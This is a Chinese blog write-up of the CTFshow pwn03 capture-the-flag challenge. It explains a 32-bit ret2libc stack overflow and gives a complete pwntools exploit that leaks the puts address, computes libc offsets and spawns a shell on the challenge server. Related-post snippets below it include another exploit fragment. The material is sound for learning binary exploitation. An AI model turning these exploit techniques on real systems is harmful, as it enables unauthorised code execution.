CTFshow pwn03(ret2libc-32bit

原创 已于 2022-12-03 14:33:24 修改 · 1k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #pwn

于 2022-11-30 08:54:59 首次发布
这篇博客详细介绍了如何在没有system或/bin/sh的情况下,通过ret2lib技术来利用栈溢出漏洞。作者使用了Python的pwn库,通过发送精心构造的payload来获取puts函数的地址,然后计算libc库的基地址,并找到了system和str_bin_sh的地址,最终实现了远程代码执行。博客提到了LibcSearcher库作为可能的替代方法,但表示在实践中遇到了问题。作者还提到,理解库的偏移对于解决此类问题至关重要。
部署运行你感兴趣的模型镜像

CTFshow-pwn03

ret2lib,代码中没有system也没有/bin/sh,都要在动态库里找
payload1得到puts真实地址

上lib database search利用puts_addr查找库

from pwn import *  
#from LibcSearcher import *

context.log_level = 'debug'  
elf = ELF('./stack1')  
#p = process('./stack1')  
p = remote("pwn.challenge.ctf.show", 28106)  
  
puts_plt = elf.plt['puts']  
puts_got = elf.got['puts']  
main_addr = elf.symbols['main']  
payload = b'a' * 13 + p32(puts_plt) + p32(main_addr) + p32(puts_got)  
p.sendline(payload)  
p.recvuntil('\n\n')//接收两个换行(?)  
puts_addr = u32(p.recv(4))//接受4位  
print(hex(puts_addr))//获得了puts地址,上lib databse search查,输入puts和后三位得到是哪个库  
 
libcbase = puts_addr - 0x067360//库基地址=puts地址-puts在库中的偏移  
system_addr = libcbase + 0x03cd10  
binsh_addr = libcbase + 0x17b8cf//可以找到str_bin_sh的偏移  
payload = b'a' * 13 + p32(system_addr) + b'a'*4 + p32(binsh_addr)//中间4位的是system返回地址,因为不需要做什么可以随便填  
p.sendline(payload)  
p.interactive()

上网查库的部分可以改用LibSearcher库实现 (虽然我的总说找不到库

lib = LibcSearcher("puts", puts_addr)
libcbase = puts_addr - lib.dump("puts")
system_addr = libcbase + lib.dump("system")
binsh_addr = libcbase + lib.dump("str_bin_sh")

看这张图感觉悟了一点…

来自ctfshow-pwn03[recorded]
用cyclic算偏移用的是eip的地址(可以gdb下溢出的时候从错误信息看到
在这里插入图片描述

您可能感兴趣的与本文相关的镜像

Python3.9

Python3.9

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

ctfshow pwn3
qq_39980610的博客
08-19 738
所以如果我们知道 libc 中某个函数的地址,那么我们就可以确定该程序利用的 libc。此外,在得到 libc 之后,其实 libc 中也是有 /bin/sh 字符串的,所以我们可以一起获得 /bin/sh 字符串的地址。我们一般常用的方法是采用 got 表泄露,即输出某个函数对应的 got 表项的内容。然后接受到的地址就是程序在libc中的地址我们就可以确定libc的版本和libc基址。函数在libc中的偏移都是固定的我们可以通过基址加偏移拿到函数地址和binsh字段。然后我们再构造rop链。
CTFShow pwn07 (ret2libc-64bit
Mintind的博客
12-03 1605
CTFShow pwn07解题记录
ret2libc类型题目思考-ret2libc1
qq_30528603的博客
05-29 342
一眼看到栈溢出,ret2libc这类型的题目就是要利用栈溢出将控制流转移到glibc库的函数中。这里我们一定是找的plt表而不是system字符串的地址,这是要分清楚的。关于plt表和got表参考我的其他博客,这个玩意我也理解了很久比较愚钝。但是我在IDA看到距离ebp是0x64h,就算换算成10进制在加4也是104,当时我就觉得很疑惑。打算复现CTFwiki中的三个ret2libc类型的实现。当函数要返回的时候,他将跳到system函数的地址去执行,此时他将把ebp+4的内容当做函数的第一个参数传递。
ctfshow_pwn03
Dem1的博客
05-19 5857
https://www.bilibili.com/video/av885494681 #查看libc地址 lbb 文件名
ctfshow pwn03
王富贵同学的博客
01-18 1715
ctfshow pwn03 知识点: 全局偏移表(GOT:Global Offset Table)存放外部的函数地址 程序链接表(PLT:Procedure Link Table)存放额外代码 延迟绑定:只有动态库函数在被调用时,才会地址解析和重定位工作 plt表和got表 程序还未执行时,got表里还是plt表的地址 程序执行后,plt表里是got表的地址,got表是函数的真实地址 截图出处 main()函数 pwnme() s只开辟了9个字节,而fgets函数读入了100(0x64)个字节 存在栈
[PWN][高级篇]ROP-ret2libc-32/64位实例 (共四个)
网络安全知识分享
03-28 5881
ROP-ret2libc-32实例 32位思路: 1、想办法调用execve("/bin/sh",null,null) 2、传入字符串/bin///sh 3、体统调用execve eax = 11 ebx = bin sh_addr ecx = 0 edx = 0 int 0x80 实例代码如下: 接下来我们检查保护 我们看到是有NX保护,没有canary和pie保护,我们使用ROP进行绕过。关键在于如何获取system 和 /bin/sh。 objdump -d -j .plt
pwn学习-ret2libc3
Sa1nZen的博客
06-30 760
pwn学习-ret2libc3
RET2LIC(32bit的PC)
m0_74406055的博客
08-18 716
儿子暂别父亲就去开垦自己的房地(子函数向下压栈来开辟自己的栈空间,其中子函数栈空间开始标志动作就是push ebp这个ebp是previous ebp即父函数的ebp值),然后继续向下开辟资源(存入子函数自己的局部变量)。1,return前,会进行leave指令操作即2步(1)callee的esp会移动到callee的ebp,(2)再弹出ebp即(pop ebp),此时ebp的值是caller的ebp,caller的ebp值又回到ebp寄存器 ,同时esp指向return address。
CTFshow-PWN入门-栈溢出pwn35~pwn40
weixin_63576152的博客
08-22 1737
本文主要详解CTFshowpwn入门系列的栈溢出模块的前6题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope参考文章:以下操作中小编用的都是自己的kali环境。
CTFshow pwn03
m0_72827793的博客
05-15 870
题目:在做本道题前,我们先了解所必要的知识。
ctfshow pwn 03 全细节题解
A2247328295的博客
04-12 1039
代码部分自己在写的时候也遇见了很多问题,我会给出解释,单句解释看图片,前半段的作用是通过泄露的puts函数获取该函数的真实地址给get_addr,然后去https://libc.blukat.me/查询libc版本获取后面函数的真实地址,后半部分就是常规的栈溢出,payload部分4个a占4个字节,同上为32位的程序,通常4个字节可以覆盖到返回地址部分。9个字节长的数组,但接受了100个字节的长度存在栈溢出,其实这里我们已经可推算出偏移为13了,32位的程序,通常情况加4个字节覆盖到返回地址。
ctfshow_pwn03 stack1
yw__y的博客
07-25 486
CTF_论剑场 pwn3
W3rsn
04-16 362
先把附件下载下来,然后checksec checksec pwn3 然后IDA64打开 read函数存在栈溢出,然后重新里还有一个getshell函数。所以控制程序运行流程使它跳转到getshell函数就可以得到flag from pwn import * context(arch="amd64", os="linux") p = remote("114.116.54.89",...
pwn03
2301_80477504的博客
02-07 1454
例行checksec(32位,打开了nx保护)ida中进行分析main函数f5查看伪代码,gets为溢出点,v4溢出,用来溢出覆盖返回地址查看字符串(发现了flag.txt)查看所在函数(发现当a1 == 814536271 && a2 == 425138641时,即可得到flag)查看a1和a2在栈上的参数位置,它的位置在返回地址之后,没法利用溢出覆盖来控制程序。
PWN-PRACTICE-CTFSHOW-3
P1umH0的博客
01-13 812
PWN-PRACTICE-CTFSHOW-3pwn10萌新赛-签到题萌新赛-数学99内部赛-签到题 pwn10 格式化字符串漏洞,覆写num为16即可打印出flag # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28045) elf=ELF("./pwn1") #gdb.attach(io,"b * 0x0
长亭PWN笔记03
kelxLZ的博客
12-28 505
什么是堆 glibc的堆管理实现 arena bins chunk malloc和free的工作流程 fastbin attack 新版本glibc中的tcache 堆的花式玩法 什么是堆 栈通常用于为函数分配固定大小的局部内存 堆是可以根据运行时的需要进行动态分配和释放的内存,大小可变 Malloc/New Free/Delete 堆的实现重点关注内存块的组织和管理方式,尤其是空闲内存块 如何提高分配和释放效率 如何降低碎片化,提高空间利用率 举例:浏览器的DOM树通常分配在堆上.
pwn3第三关
qq_18823653的博客
03-30 323
溢出点,保护都和上一关一样,这一关有外部函数system()和字符串/bin/sh, exp如下: from pwn import * elf=ELF('./pwn3') p=process('./pwn3') payload='a'*112+p32(elf.plt['system'])+p32(0x11111111)+p32(0x08048720) #0x111111是返回地址,0x080487...
PWN】02.Linux-User Mode-栈溢出-x86-基础介绍
weixin_52553215的博客
11-14 1324
参考:顾忧栈与栈帧的调试1.使用非类型安全语言(non-type-safe),如C/C++2.编译器设置的内存缓冲区太靠近关键数据结构寄存器是中央处理器内的组成部份。内存和寄存器是为了解决存储器读写速度而产生的多级存储机制。寄存器亦称缓存。:存储着 指向 系统栈最上面一个栈帧的的指针,在压栈和出栈时发生变化:存储着 指向 系统栈最上面一个栈帧的的指针,在函数运行时不变,可用来确定存储着 指向的指针是一种通用寄存器,在算术运算中存储输入输出数据,为函数提供返回值。
ctf wiki pwn ret2libc
最新发布
03-01
### CTF PWN Ret2libc 攻击教程与实例 Ret2libc是一种利用栈溢出漏洞的技术,在这种技术下,攻击者通过覆盖返回地址来调用系统中的现有函数(通常是`system()`),从而执行任意命令。当面对静态链接的二进制文件时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值